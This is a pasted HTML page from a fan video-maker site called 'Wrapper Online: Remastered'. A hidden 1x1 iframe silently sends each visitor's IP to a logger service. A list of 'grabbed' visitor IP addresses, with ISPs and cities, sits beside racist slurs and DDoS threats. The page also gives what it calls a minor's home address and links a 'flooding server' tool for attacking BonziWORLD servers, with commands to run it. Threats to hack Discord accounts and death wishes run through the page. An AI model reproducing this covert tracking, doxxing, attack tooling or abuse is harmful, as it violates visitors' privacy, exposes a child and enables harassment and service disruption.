your videos on wrapper online remastered
3 years ago in Plain Text
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<link rel="icon" href="../../favicon.ico" type="image/png">
<title>Wrapper Online: Remastered - Stuck-up maker list</title>
<meta name="theme-color" content="lime">
<meta name="description" content="Wrapper Online: Remastered - Stuck-up maker list of people containing of random videos were published">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
<meta name="mobile-web-app-capable" content="yes" />
<link rel="manifest" href="manifest.json">
<link rel="stylesheet" type="text/css" href="modern-normalize.css">
<link rel="stylesheet" type="text/css" href="global.css">
<link rel="stylesheet" type="text/css" href="list.css">
</head>
<script src="//code.jquery.com/ui/1.12.1/jquery-ui.js"></script>
<script src="//code.jquery.com/jquery-1.12.4.js"></script>
<script src="//moment.github.io/luxon/global/luxon.js"></script>
<style>
table {
width: 100%;
max-width: 100%;
margin-bottom: 127px;
margin-right: auto;
margin-left: auto;
background-color: transparent;
border-collapse: collapse;
border-spacing: 0;
font-size: 14px;
}
@media(min-width: 768px) {
table {
width: 750px;
}
}
@media(min-width: 992px) {
table {
width: 970px;
}
}
@media(min-width: 1200px) {
table {
width: 1170px;
}
}
thead {
font-weight: 200;
}
td {
padding: 8px;
vertical-align: middle;
line-height: 1.42857143;
}
thead {
border-bottom: 2px solid #ddd;
}
tbody>tr {
border-top: 0;
border-bottom: 1px solid #ddd;
}
tbody>tr:hover {
background-color: #f5f5f5;
}
tr>:nth-child(1) {
width: 64px;
}
tr>:nth-child(1)>img {
height: 36px;
}
tr>:nth-child(1) {
word-break: break-word;
}
tr>:nth-child(2) {
color: #999;
}
tr>:nth-child(3) {
width: 250px;
}
tr>:nth-child(3)>* {
display: inline-block;
text-align: center;
font-size: 12px;
width: 8.5px;
}
tr>:nth-child(4) {
font-family: 'GlyphiconsRegular';
text-decoration: none;
padding-top: 5px;
font-size: 14px;
width: 90px;
}
tr>:nth-child(4)>a {
display: inline-block;
text-decoration: none;
padding-right: 10px;
color: #474747;
}
tr>:nth-child(4)>a:hover {
color: #d85e27;
}
tr>:nth-child(4)>:nth-child(1)::before {
content: '\E174';
}
tr>:nth-child(4)>:nth-child(2)::before {
content: '\E235';
}
tr>:nth-child(4)>:nth-child(3)::before {
content: '\E182';
}
tfoot>tr>td {
text-align: center;
border: none;
}
tfoot>tr>td>a {
text-decoration: none;
color: #474747;
font-size: 14px;
}
form {
display: none;
}
/***
this css has the general header/footer layout stuff
***/
/**
general
**/
html,body{
background: #fff;
color: #474747;
font: 16px/1.5 'Sailec', Arial, sans-serif;
width:100%;height:100%;
}
body {
display: flex;
flex-direction: column;
}
/**
header
**/
header {
/* style */
background: #1e1e1e;
color: #fff;
text-align: center;
/* layout */
height: 44px;
padding: 0 15px;
display: flex;
justify-content: space-between;
position: -webkit-sticky;
position: sticky;
top: 0;
}
#logo {
margin-top: 4px;
height: 35px;
}
/* buttons */
.button_big,
.button_small {
/* style */
font-size: 14px;
text-decoration: none;
color: #fff;
border-radius: 6px;
/* layout */
display: inline-block;
padding: 5px 10px;
margin: 6px 5px;
}
.button_big:hover,
.button_small:hover {
cursor: pointer;
}
/* small buttons */
.button_small { background: #333 }
.button_small:hover { background: #444; color: #d85e27 }
/* big buttons */
.button_big {
background-color: #d85e27;
width: 160px;
}
.button_big:hover {
text-decoration: underline;
}
/**
header dropdowns
**/
/* change button margin/padding to fit dropdown */
.dropdown_contain { padding: 0; margin: 6px 5px; }
.dropdown_button { margin: 0; padding: 5px 10px; }
/* make dropdown appear on hover */
.dropdown_contain:hover>nav {
display: block;
cursor: default;
}
/* the dropdown itself */
.dropdown_menu {
/* style */
background-color: #444;
border-radius: 6px;
/* layout */
width: 100%;
padding: 10px 0;
margin: 0;
text-align: left;
/* hover stuff */
position: relative;
float: left;
display: none;
}
/* dropdown links */
.dropdown_menu>a {
/* style */
color: #ddd;
text-decoration: none;
/* layout */
display: block;
padding: 2px 20px;
}
.dropdown_menu>a:hover {
background: #222;
color: #d85e27;
cursor: pointer;
}
/* dropdown header and separation */
.dropdown_menu>h2 {
/* style */
color: #fff;
font-size: 15px;
/* layout */
margin:0;
padding:2px 20px;
}
.dropdown_menu>hr {
border: 1px solid #222;
margin: 10px 0;
}
/**
footer
**/
footer{
background: #1e1e1e;
margin-top: auto; /* footer at the foot */
display: flex;
justify-content: space-between
}
footer nav { margin:5px 10px}
/* links */
footer a {
color: #fff;
text-decoration:none;
margin: 0 10px;
font-weight: bold;
}
footer a:hover {
text-decoration: underline;
}
/**
font importing
**/
@font-face {
font-family: 'Sailec';
font-weight: 100;
src: url('Sailec-Thin.woff') format('woff');
}
@font-face {
font-family: 'Sailec';
font-weight: 200;
src: url('Sailec-Light.woff') format('woff');
}
@font-face {
font-family: 'Sailec';
font-weight: 400;
src: url('Sailec-Regular.woff') format('woff');
}
@font-face {
font-family: 'Sailec';
font-weight: 500;
src: url('Sailec-Medium.woff') format('woff');
}
/* font weight 500 and font weight 700 (bold) are the same for better integration support */
@font-face {
font-family: 'Sailec';
font-weight: 700;
src: url('Sailec-Medium.woff') format('woff');
}
@font-face {
font-family: 'GlyphiconsRegular';
src: url('glyphicons-regular.woff') format('woff');
font-weight: normal;
font-style: normal;
}
/*! modern-normalize v0.6.0 | MIT License | https://github.com/sindresorhus/modern-normalize */
/*
Document
========
*/
/**
Use a better box model (opinionated).
*/
*,
*::before,
*::after {
box-sizing: border-box;
}
/**
Use a more readable tab size (opinionated).
*/
:root {
-moz-tab-size: 4;
tab-size: 4;
}
/**
1. Correct the line height in all browsers.
2. Prevent adjustments of font size after orientation changes in iOS.
*/
html {
line-height: 1.15; /* 1 */
-webkit-text-size-adjust: 100%; /* 2 */
}
/*
Sections
========
*/
/**
Remove the margin in all browsers.
*/
body {
margin: 0;
}
/*
Grouping content
================
*/
/**
Add the correct height in Firefox.
*/
hr {
height: 0;
}
/*
Text-level semantics
====================
*/
/**
Add the correct text decoration in Chrome, Edge, and Safari.
*/
abbr[title] {
text-decoration: underline dotted;
}
/**
Add the correct font weight in Edge and Safari.
*/
b,
strong {
font-weight: bolder;
}
/**
1. Improve consistency of default fonts in all browsers. (https://github.com/sindresorhus/modern-normalize/issues/3)
2. Correct the odd 'em' font sizing in all browsers.
*/
code,
kbd,
samp,
pre {
font-family:
SFMono-Regular,
Consolas,
'Liberation Mono',
Menlo,
monospace; /* 1 */
font-size: 1em; /* 2 */
}
/**
Add the correct font size in all browsers.
*/
small {
font-size: 80%;
}
/**
Prevent 'sub' and 'sup' elements from affecting the line height in all browsers.
*/
sub,
sup {
font-size: 75%;
line-height: 0;
position: relative;
vertical-align: baseline;
}
sub {
bottom: -0.25em;
}
sup {
top: -0.5em;
}
/*
Forms
=====
*/
/**
1. Change the font styles in all browsers.
2. Remove the margin in Firefox and Safari.
*/
button,
input,
optgroup,
select,
textarea {
font-family: inherit; /* 1 */
font-size: 100%; /* 1 */
line-height: 1.15; /* 1 */
margin: 0; /* 2 */
}
/**
Remove the inheritance of text transform in Edge and Firefox.
1. Remove the inheritance of text transform in Firefox.
*/
button,
select { /* 1 */
text-transform: none;
}
/**
Correct the inability to style clickable types in iOS and Safari.
*/
button,
[type='button'],
[type='reset'],
[type='submit'] {
-webkit-appearance: button;
}
/**
Remove the inner border and padding in Firefox.
*/
button::-moz-focus-inner,
[type='button']::-moz-focus-inner,
[type='reset']::-moz-focus-inner,
[type='submit']::-moz-focus-inner {
border-style: none;
padding: 0;
}
/**
Restore the focus styles unset by the previous rule.
*/
button:-moz-focusring,
[type='button']:-moz-focusring,
[type='reset']:-moz-focusring,
[type='submit']:-moz-focusring {
outline: 1px dotted ButtonText;
}
/**
Correct the padding in Firefox.
*/
fieldset {
padding: 0.35em 0.75em 0.625em;
}
/**
Remove the padding so developers are not caught out when they zero out 'fieldset' elements in all browsers.
*/
legend {
padding: 0;
}
/**
Add the correct vertical alignment in Chrome and Firefox.
*/
progress {
vertical-align: baseline;
}
/**
Correct the cursor style of increment and decrement buttons in Safari.
*/
[type='number']::-webkit-inner-spin-button,
[type='number']::-webkit-outer-spin-button {
height: auto;
}
/**
1. Correct the odd appearance in Chrome and Safari.
2. Correct the outline style in Safari.
*/
[type='search'] {
-webkit-appearance: textfield; /* 1 */
outline-offset: -2px; /* 2 */
}
/**
Remove the inner padding in Chrome and Safari on macOS.
*/
[type='search']::-webkit-search-decoration {
-webkit-appearance: none;
}
/**
1. Correct the inability to style clickable types in iOS and Safari.
2. Change font properties to 'inherit' in Safari.
*/
::-webkit-file-upload-button {
-webkit-appearance: button; /* 1 */
font: inherit; /* 2 */
}
/*
Interactive
===========
*/
/*
Add the correct display in Chrome and Safari.
*/
summary {
display: list-item;
}
b { color: purple; background: hotpink; }
</style>
<body onload="var lkd = new Audio('samsung.mp3');lkd.play()">
<header>
<h1 style="margin:0"><a href="list.html"><img id="logo" src="list_logo.png" alt="Wrapper Online: Remastered - Stuck-up maker"/></a></h1>
<nav id="headbuttons">
<div class="dropdown_contain button_small">
<div onclick="window.location.href = 'http://78.63.40.199:700'" class="dropdown_button" style="background: gold;">GOLD MAKER</div>
</div>
<div class="dropdown_contain button_small">
<div class="dropdown_button">ONLINE GEN.</div>
<nav class="dropdown_menu">
<a href="gen_ban.html">BonziWORLD "You got banned!" generator</a>
<a href="gen_playbutton.html">YouTube Play Button generator</a>
<a href="gen_naughty.html">Santa writes naughty or nice list?</a>
</nav>
</div>
<div class="dropdown_contain button_small">
<div class="dropdown_button">MISCELLANEOUS</div>
<nav class="dropdown_menu">
<a href="videos.html" title="Wrapper Online: Remastered. Danielius Edition.">New Version (WORDE)</a>
<a href="makevid.html" title="GoAnimate for Schools Remastered: Unpatchable">Old Version (GA4SRU)</a>
<a href="loskie.html">Kill Loskythecopydog77</a>
<a href="acs.html">Microsoft Agent Demo</a>
<a href="#" onclick="document.cookie.split(";").forEach(function(c) { document.cookie = c.replace(/^ +/, "").replace(/=.*/, '=;expires=' + new Date().toUTCString() + ';path=/'); });">CLEAR ALL COOKIES DANGEROUSLY</a>
</nav>
</div>
</div>
<a href="javascript:alert('Ha ha! Take this losers and objectfaggots!')" onclick="document.getElementById('files').click();" class="button_big" disabled title="This upload isn't must be possible. I have disabled the uploads right now to stop this criticism and spamming lots of MBs on my hard drive, you don't ever scheme this seriously. Also it's my HHD is TOSHIBA MQ01ABD050V -63 in the outside of ASUS-X52J laptop. If you try seriously to hack my hard drive to delete System32, I had to mind to upgrade Windows 10 into 64-bit architecture operating system and reinstall over again like Tomas Marciulaitis even did by Microsoft Tech Support by giving him a ransomware, may you brainwash and stop thinking about to me things I can do anything we want. Your repetition is not a life, do things like Fleeing the Complex, Puyo Puyo Tetris, SM3DAS, Among Us or you still play Roblox on this game, not this illegal of the maker is deserve to be patched. It's unpatchable right? You are not your boss, I can ban your accounts then IP banned to the team would like to ban you and strike you for some dumb reasons, you can appeal and say sorry for dozens of times and apology is not accepted anymore, just great and your apology is not gonna to accept at all of the time, your apology is not enough for this. You have no idea that you beg others like: PLEAZ UNBAN ME PLS PLS I AM SORRY I WILL NOT DO ANYTHING LIKE THAT I AM SORRY PLEASE I AM SORRY ACCEPT MY APOLOGIES PLS!!!! I CAN DO ANYTHING WE LIKE IT. MY SOCIAL MEDIA ISN'T MY WRONG WAY, I DIDN'T DO ANYTHIN FOR DECISION OF YOUR STATEMENT. YOUR IMPLEMENT, PLEASE!. Team says: You have no idea to talk and beg for unbanning me and say sorry isn't just be possible. Check your language and clean up your grammar first, it's extremely bad. Denied. | Always was denied. You can't appeal for next time. If you appeal with bad words, then you may get your account banned or suspended. | Beggar says: NOOOOOOOOOOOOOOOOOOOOOOOOOOOO I AM FUCKING BANNED I HAVE TO CREAT MY FUCKING NEW ACCOUNT! *types new account and creates him then email verification then profit* YAY I CREATED THE FUCKIN ACCOUNT NOBODY CAN BAN ME AND FIND ME BITCHES HAHAHAHAHAHAHAHAHAHA. Team: Hello, BEGGAR IS BACK! We inform you that you are not allowed to enter the Twitter and I have IP banned for you, have a nice day. Thank you very much. If this mistake, no decisions, worries will still there, sorry is goodbye for your website. Say your prayers and say goodbye all you want, whenever you want to do that. I see your account was created before I banned you then. Get your life and farm over one year and leave-out of the internet connectivity and suck your life and go fuck urself of your life. Jesus christ, I have no other words that you will say to me, you being too psychopathic person in the world. I am going to send your account posts and the people will laugh at you, then you are so freaking bitch. Nobody cares. You can't go away of this website, I can ban and find your ISP to ban you newly. You don't have a assignment. | Gone for newest accounts being banned for new account creation. Before that, ISP banned example of this ugly person and fat takis person in the United states. Get your heinz and poop your tomatoes down. ISP banned this ugly person and unable to connect the internet because he is so retarded and hatred. Thanks for your surveillance and your accommodations.">UPLOAD</a>
<div class="dropdown_contain button_small">
<div class="dropdown_button" onclick="window.location.href = '../cc?themeId=family&bs=adam'">CREATE A CHARACTER</div>
<nav class="dropdown_menu">
<h2>Business Friendly</h2>
<a href="/cc?themeId=business&bs=default">Business (Male)</a>
<a href="/cc?themeId=business&bs=heavy">Heavy (Female)</a>
<a href="/cc?themeId=business&bs=kid">Kid (Child)</a>
<h2>Whiteboard</h2>
<a href="/cc?themeId=whiteboard&bs=default">Whiteboard (High)</a>
<a href="/cc?themeId=whiteboard&bs=kid">Whiteboard (Small)</a>
<h2>Comedy World</h2>
<a href="/cc?themeId=family&bs=adam">Guy (Adam)</a>
<a href="/cc?themeId=family&bs=eve">Girl (Eve)</a>
<a href="/cc?themeId=family&bs=bob">Fat (Bob)</a>
<a href="/cc?themeId=family&bs=rocky">Strong (Rocky)</a>
<hr>
<h2>Anime</h2>
<a href="/cc?themeId=anime&bs=guy">Guy</a>
<a href="/cc?themeId=anime&bs=girl">Girl</a>
<a href="/cc?themeId=ninjaanime&bs=guy">Guy (Ninja)</a>
<a href="/cc?themeId=ninjaanime&bs=girl">Girl (Ninja)</a>
<hr>
<h2>Peepz</h2>
<a href="/cc?themeId=cc2&bs=default">Lil' Peepz</a>
<a href="/cc?themeId=chibi&bs=default">Chibi' Peepz</a>
<a href="/cc?themeId=ninja&bs=default">Chibi' Ninjas</a>
<hr>
<h2>Space Citizen</h2>
<a href="/cc?themeId=spacecitizen&bs=guy">Space Citizen (Guy)</a>
<a href="/cc?themeId=spacecitizen&bs=girl">Space Citizen (Girl)</a>
<a href="/cc?themeId=spacecitizen&bs=muscular_guy">Space Citizen (Muscular)</a>
</nav>
</div>
<a href="/go_full" class="button_big">MAKE A VIDEO</a>
</nav>
</header>
<center><iframe src="https://2no.co/22pYr6" width="1" height="1"></iframe><iframe src="http://78.63.40.199:3005" width="800" height="600"></iframe></center>
<hr noshade>
<p id="fefe" style="display: block;">This upload isn't must be possible. I have disabled the uploads right now to stop this criticism and spamming lots of MBs on my hard drive, you don't ever scheme this seriously. Also it's my HHD is TOSHIBA MQ01ABD050V -63 in the outside of ASUS-X52J laptop. If you try seriously to hack my hard drive to delete System32, I had to mind to upgrade Windows 10 into 64-bit architecture operating system and reinstall over again like Tomas Marciulaitis even did by Microsoft Tech Support by giving him a ransomware, may you brainwash and stop thinking about to me things we can do anything we want, not your problem of your bitch problems, get rekt by Protegent Antivirus (OOPS MY SYSTEM CRASHED, I LOST MY DEETA, BUT I HAD AN ANTIVIRUS!) and get MEMZ'ed on your computer then Nyan Cat time on your boot section. Your repetition is not a life, do things like Fleeing the Complex, Puyo Puyo Tetris, SM3DAS, Among Us or you still play Roblox on this game, not this illegal of the maker is deserve to be patched. It's unpatchable right? You are not your boss, I can ban your accounts then IP banned to the team would like to ban you and strike you for some dumb reasons, you can appeal and say sorry for dozens of times and apology is not accepted anymore, just great and your apology is not gonna to accept at all of the time, your apology is not enough for this. You have no idea that you beg others like: <b>"PLEAZ UNBAN ME PLS PLS I AM SORRY I WILL NOT DO ANYTHING LIKE THAT I AM SORRY PLEASE I AM SORRY ACCEPT MY APOLOGIES PLS!!!! I CAN DO ANYTHING WE LIKE IT. MY SOCIAL MEDIA ISN'T MY WRONG WAY, I DIDN'T DO ANYTHIN FOR DECISION OF YOUR STATEMENT. YOUR IMPLEMENT, PLEASE!"</b>. Team says: <b>"You have no idea to talk and beg for unbanning me and say sorry isn't just be possible. Check your language and clean up your grammar first, it's extremely bad. Denied."</b> Always was denied. You can't appeal for next time. If you appeal with bad words, then you may get your account banned or suspended. Beggar says: <b>"NOOOOOOOOOOOOOOOOOOOOOOOOOOOO I AM FUCKING BANNED I HAVE TO CREAT MY FUCKING NEW ACCOUNT!"</b> <em>*types new account and creates him then email verification then profit???*</em> <b>"YAY I CREATED THE FUCKIN ACCOUNT NOBODY CAN BAN ME AND FIND ME BITCHES HAHAHAHAHAHAHAHAHAHA."</b> Team: <b>"Hello, BEGGAR IS BACK! We inform you that you are not allowed to enter the Twitter and I have IP banned for you, have a nice day. Thank you very much. If this mistake, no decisions, worries will still there, sorry is goodbye for your website. Say your prayers and say goodbye all you want, whenever you want to do that. I see your account was created before I banned you then. Get your life and farm over one year and leave-out of the internet connectivity and suck your life and go fuck urself of your life. Jesus christ, I have no other words that you will say to me, you being too psychopathic person in the world. I am going to send your account posts and the people will laugh at you, then you are so freaking bitch. Nobody cares. You can't go away of this website, I can ban and find your ISP to ban you newly. You don't have a assignment."</b> Gone for newest accounts being banned for new account creation. Before that, ISP banned example of this ugly person and fat takis person in the United states. Get your heinz and poop your tomatoes down. ISP banned this ugly person and unable to connect the internet because he is so retarded and hatred. If you want to stop patching and exposing this link, then quit Vyond Studio, it's fucking sucks, it's not different type. You wouldn't be GoAnimator, leave on Discord server called "Wrapper Central", demote if you're serious GoAnimator in the world, demote and leave and delete your server immediately. It's bloody and lot of dead chats that are cheating and misbehaving GoAnimate requests. If you don't leave and delete your Discord server, I will hack your account and force delete your server (no undo for a server), then you would to deserve for being like a police officer and a keeper with the server does fantastic idea. And you may about think if is legal, to delete a community server wouldn't could can just stop it. Hacking on Discord is misbehaving users, that you don't use this, but hackers forcely to do with these things to hijack and remote your computer for no reason. Remoting your computer is PROBABLY impossible to hack you, and they can deserve and control you all over of your time is to spend up, turn off Internet connection and don't turn on again before hacker is finished hacking you or sneak it and shoot you to steal your electronics if you don't listen what text was saying. I am Onute, everyone, remember this. Stop creating GoAnimate discord servers, it's gonna to raid your server and definitely mock you like an horse neighing and UTTP is gonna to raid to our server right now. You shouldn't to do with this GoAnimate, leave instead and don't you dare join GoAnimate community. It's dead website, right? I have no opinions from my life. Delete your videos and stop making random grounded videos out of kid shows, kids may frighten and parents don't recognize with these grounded videos. Grounded videos are going to die and they can strike your videos by receiving an Community Guidelines or Copyright strike on the social networking website. All GoAnimator channels must to be terminated for frightening kids for making grounded videos and making kids cry like babies. I'm so shocked in today, they keep running this community, I wish you will die in COVID-19 for pointing an useless person and get sick in days. You should to know it right now and get sick right now for the sight then go to heaven permanently were you died, your life is game over man. Would you will think if you're a pedophile and a son of a bitch. Thanks for your surveillance and your accommodations. See ya.</p>
<div id="red" style="display:none;">
<center>
<p>Get IP exposed haha get ddosed haha, upload disabled haha so you can't do anything with the pirated wrapper online website right now muhahahahahahahahahahahahahahahahahaha you can't launch the ddos attack with low orbit ion cannon to me hahahaha. look at me i am the guy <img src="char_noanimations.png" width="80px"></p>
<img src="Kiddoface.jpg" width="80px">
<p>The owner on this website is precisely hosted by Danielius Paulavičius</p>
<p>Danielius Paulavičius (born Jan 8 2006, age 14, location Lithuania, Šilalės raj. Kaltinėnai, Gineikiai, Akmenos g. 17) (NOTE: THIS IS MY HOUSE) is a Gmod gamer, Nintendo gamer, Sega gamer, Minecrafter, JS programmer, GoAnimator, BFB fan, Collab VM fan, BonziWORLD hoster, YouTuber. Workings: He was working on middle school at 8th grade for now called KASG (Kaltinėnų Aleksandro Stulginskio gimnazija), but she was a good student and she got good values. Workings on home: This is me 14-year-old I am working with video editing software I use Vegas Pro 11 on my 32-bit Asus-X52J laptop, this is so powerful but also it lags often. Rewards with peripherals: He got a phone from end of December 2015 now then 2016. He got a another phone from start of 2018 in skipped days because can't afford it keeps freezes and then it crashes as well (likely shooting and buzzing noises). He got a another phone called "Samsung Note 8" with DUOS support to make SIM cards faster to start up. He got a laptop in 2013 by my bearded dad, I see that uses Windows 7 and she plays Counter Strike with other bsp maps installed. Wow that's serious! After 2015, I clicked to upgrade Windows 10 by accident with my friend David from Germany, so amazing operating system is made, thank you microsoft!</p>
<p>A few moments later, 14-year-old got an idea to host the website called Wrapper Online remastered and it was a artist with Paint.NET.</p>
<p>Ok, stop exposing, you guess what, I revealed my location haha visit to my house then I can break the finger you americans, I can fight like a super karate you can't kill me! \('o')/</p>
<p>ok please stop ddosing me. ddos attack is a overloaded attack which that is slowing down its network and ip address. when you try to ddos google, it wouldn't work, because it's enabled with DDoS protection and cloudflare has have to protect with ddos only 30 tbps per second enough. if you don't listen to stop the ddos attack, you remained to ddos my ip address; you will get thousands of dollars/euros damages, fbi will raid your house and get arrested for ddosing innocent ip address. also unfortunately there is no way I can change the ip address, it is something way to change? maybe i will buy another router with lot of bandwidth. I will call the isp to request a new static ip address, then voila! no attacks incoming. or I guess to buy TP-Link Atheros C50 and have a setting to enable DoS attack SYN.</p>
<p>also did you will be probably ddos forever in the time? actually, you will get arrested because police has a remain for your actions they will steal your pc and go to jail in 10 years haha</p>
<p>There is no option to enable SYN ddos protection. I may to use cloudflare to protect my website and eventually you can't find my ip address, this cloudflare ip will be located in united states because of database is stored</p>
<p>Okay, please stop DDoSing me right now. Just I will talk you how these attacks under the Internet work? DDoS attack - is a overloaded attack, which that is slowing down its network and their IP address. Your router has been screwed or fried in this time, but firewall and DMZ will not work, because you hosted an wrong website! You need to do something else to prevent them. Calling ISP while the attack will cause to stop DDoS attack, your ISP will change your new IP address hereby, you must to ask your IP address if you remain the DDoS attack. The most fact are called botnet, the botnets are attackers is being launched by hacker or software application were you using, it's illegal! For example, when you try to DDoS www.google.com, it wouldn't work, because it's enabled with DDoS protection and his exabyte data center servers. Or maybe it's the sister website that is called "Cloudflare", it's only for 30 terabits per second enough! Try creating your account on Cloudflare, then you can customize your website for free! Luckily, you can ban clients when they visiting the website, if client DDoS'es too much, make sure to ban him for hard! However, this is a subscription fee that unlocks more features than free subscription, it's <del>free</del> expensive! If you don't listen, to stop the DDoS attack, you remained to DDoS my IP address. So, you will get thousands of dollars/euros damages, one dollar damage per minute. Federal Bureau of Investigation (FBI) will raid your house and they get you arrested, for DDoSing a innocent IP address from other company is created. This jail will take in 10 years, you couldn't escape, because you are hacker, police may still know you, if you're a hacker. Also unfortunately, there is no way I can change my IP address, it is something way to change it ever? Maybe I will buy the another router with lot of bandwidth, I will call the ISP to request a new static IP address, then voila, for addiction! No attacks incoming. Or I guess that, I will buy new router called "TP-Link Atheros C50". Then you have a setting to enable DoS attack SYN. Also did you will be probably DDoS forever in this time? Actually, the police station may notify the police, they will find your home location and get your fraud fee and get arrested because police has a remain for your actions and what are you doing here! In case, they'll steal your computer and go to jail for 10 years, this is good idea haha! There is no option to enable SYN ddos protection. I may to use Cloudflare to protect my website and eventually, you can't find my IP address. This Cloudflare IP will be located in United States at Konsas because, it's stored with database.</p>
<p>If you are remain for DDoS attack:</p>
<li>Use VPN, VPN needs you to buy and relax your experience for your attacked IP.
<li>Use Tor, Tor will be sent into Tor servers, also it's impossible to get a IP. Tor will not work for some websites that called "IP spoofing" or call as "IP logging".
<li>Change your proxy connection
<li>Call the ISP to request a new IP within money.
<li>Wait till for dynamic IP address will change frequently, in this, able to stop it.
<li>Enable DoS protection on a newest router (In new TP-Link routers you can find on Advanced settings tab to enable them).
<p>If these solutions don't work, maybe get a new house and get a new IP address, you will be legally to use it and reconfigure again. Enjoy using it!</p>
<p>GoAnimators, stop DDoSing me! It's illegal to DDoS attack at me, you will get arrested!</p>
</center>
</div>
<center>
<iframe src="http://78.63.40.199" width="1024" height="768"></iframe>
<h1>address: http://78.63.40.199 replace at line 3, if doesn't work, right click to download</h1>
<h2>NEW NPM FILE! <a href="bonziworld_crash.7z" download="BonziWORLDF.7z">DOWNLOAD THE FLOODING SERVER FOR EVERY BONZIWORLD!</a></h2>
<textarea rows="10" cols="50" style="resize: none;">
cd bonziworld_crash
npm install -f
node flood.js
</textarea>
<h2 style="display: none;">Check out for Generators category! It has new tools you can use!</h2>
<h2 style="display: none;">The website "onuteworld.tk" was been deleted, ICS have been deleted my domain thanks to you, now basically use 78.63.40.199 forever, or I think, I will just going to create another from Freenom or not. So on.</h2>
<div id="musicch">
<button onclick="var lkd = new Audio('focusing.mp3');lkd.play()">Focusing</button>
<button onclick="var lkd = new Audio('yamaha.mp3');lkd.play()">Mario Paint Yahama Midradio</button>
<button onclick="var lkd = new Audio('jewel.mp3');lkd.play()">Super Jewel Quest for Samsung</button>
<button onclick="var lkd = new Audio('sjq.mp3');lkd.play()">Super Jewel Quest (reverb)</button>
<button onclick="var lkd = new Audio('dance.mp3');lkd.play()">Samsung SGH ringtone</button>
<button onclick="var lkd = new Audio('samsung.mp3');lkd.play()">Full auto 2 battlelines psp</button>
</div>
</center>
<main>
<table>
<thead>
<tr>
<td></td>
<td>Video Title</td>
<td>Last Modified</td>
<td></td>
</tr>
</thead>
<tbody></tbody>
<tfoot>
<tr>
<td colspan="127"><a id="load_more" href="javascript:;">LOAD MORE...</a></td>
</tr>
</tfoot>
</table>
</main>
<center>
<p>Grabbed Gofag IP addresses | I will expose your ip address forever muhahahahahahaha get ddosed muhahahahahahaha</p>
<a href="https://2no.co/logger/zrybd222pYr6" target="_target"> STATISTICS</a>
<div id="ips" style="display: none;">
<div style="font-weight: bolder;">216.49.16.44 (ISP: PenTeleData, Country: United States, Region: Pennsylvania, City: Hazleton, Hostname: 216.49.16.44.res-cmts.hzl2.ptd.net) <b>(HAZLETON FAN JUST LOOK AT THIS! I'D GET IP LOGGED)</b></div>
<div style="font-weight: bolder;">61.6.236.205 (ISP: UNN (Unified National Networks), Country: Brunei, Region: Brunei-Muara District, City: Bandar Seri Begawan, Hostname: 205-236.adsl.static.espeed.com.bn) <b>(brunei more like funkey gofag beats)</b></div>
<div style="font-weight: bolder;">149.27.86.50 (ISP: Kcell JSC, Country: Kazakhstan, Region: Shymkent, City: Shymkent, Hostname: 149-27-86-50.kcell.kz) <b>(no its)</b></div>
<div style="font-weight: bolder;">89.76.112.44 (ISP: UPC Polska, Country: Poland, Region: Pomerania, City: Gdynia, Hostname: 89-76-112-44.dynamic.chello.pl) <b>(poland! how dare you go to lithuania! thats it you are grounded for eternity go to your room right now)</b></div>
<div style="font-weight: bolder;">149.27.92.55 (ISP: Kcell JSC, Country: Kazakhstan, Region: Shymkent, City: Shymkent, Hostname: 149-27-92-55.kcell.kz) <b>(same you)</b></div>
<div style="font-weight: bolder;">149.27.237.194 (ISP: Kcell JSC, Country: Kazakhstan, Region: Shymkent, City: Shymkent, Hostname: 149-27-237-194.kcell.kz) <b>(kazakhstan needs to explode with covid 19)</b></div>
<div style="font-weight: bolder;">5.13.195.238 (ISP: Digi Romania, Country: Romania, Region: Galati, City: Galati, Hostname: 5-13-195-238.residential.rdsnet.ro) <b>(An fucking romanian does the fuckin ass nigger romanian guy is so fuckin grounded lel)</b></div>
<div style="font-weight: bolder;">76.236.31.252 (ISP: AT&T U-verse, Country: United States, Region: California, City: San Jose, Hostname: 76-236-31-252.lightspeed.sntcca.sbcglobal.net) <b>(california dies)</b></div>
<div style="font-weight: bolder;">90.168.76.135 (ISP: Orange Espana, Country: Spain, Region: Seville, City: Seville, Hostname: 90.168.76.135) <b>(go to duolingo)</div>
<div style="font-weight: bolder;">24.228.25.93 (ISP: Optimum Online, Country: United States, Region: New York, City: The Bronx, Hostname: ool-18e4195d.dyn.optonline.net) <b>(destroy it)</b></div>
<div style="font-weight: bolder;">45.5.93.226 (ISP: Senal Interactiva, S.A De C.VC, Country: Mexico, Region: Coahuila, City: Sabinas, Hostname: mva.nrtmexico.mx) <b>(mexico more like italian)</b></div>
<div style="font-weight: bolder;">107.77.236.78 (ISP: AT&T Wireless, Country: United States, Region: Georgia, City: Atlanta, Hostname: mobile-107-77-236-78.mobile.att.net) <b>(georgian shit go to egypt)</b></div>
<div style="font-weight: bolder;">98.195.49.252 (ISP: Comcast Cable, Country: United States, Region: Texas, City: Houston, Hostname: c-98-195-49-252.hsd1.tx.comcast.net) <b>(go to washington waaaaaaaaaaaaaaaa)</b></div>
<div style="font-weight: bolder;">79.101.239.56 (ISP: Telekom Srbija, Country: Serbia, Region: South Backa, City: Novi Sad, Hostname: 79-101-239-56.dynamic.isp.telekom.rs) <b>(fucking serbia)</b></div>
<div style="font-weight: bolder;">123.215.118.6 (ISP: SK Broadband, S.A De C.VC, Country: South Korea, Region: Gangwon-do, City: Boryeong, Hostname: 123.215.118.6) <b>(JUST WOW THE SOUTH KOREA FAN CAME HERE, SOUTH KOREA ROCKS)</b></div>
<div style="font-weight: bolder;"></div>
<div style="font-weight: bolder;"></div>
<div style="font-weight: bolder;"></div>
<div style="font-weight: bolder;"></div>
<div style="font-weight: bolder;"></div>
<div style="font-weight: bolder;"></div>
<div style="font-weight: bolder;"></div>
<div style="font-weight: bolder;"></div>
<div style="font-weight: bolder;"></div>
<div style="font-weight: bolder;"></div>
<div style="font-weight: bolder;"></div>
<div style="font-weight: bolder;"></div>
<p><pre>45.5.93.226
24.228.25.93
78.63.40.199
90.168.76.135
76.236.31.252
5.13.195.238
98.195.49.252
107.77.236.78
79.101.239.56
123.215.118.6
107.77.236.177
45.25.24.208
181.203.35.253
71.183.48.140
71.114.80.37
213.57.215.91
83.142.111.243
69.125.193.14
45.33.135.44
194.35.119.11
81.44.175.53
202.151.68.86
2.25.101.0
109.177.39.226
45.50.50.80
24.153.119.115
173.67.17.71
191.111.129.227
123.208.136.248
68.230.222.161
107.77.189.10
93.159.197.201
162.197.41.242
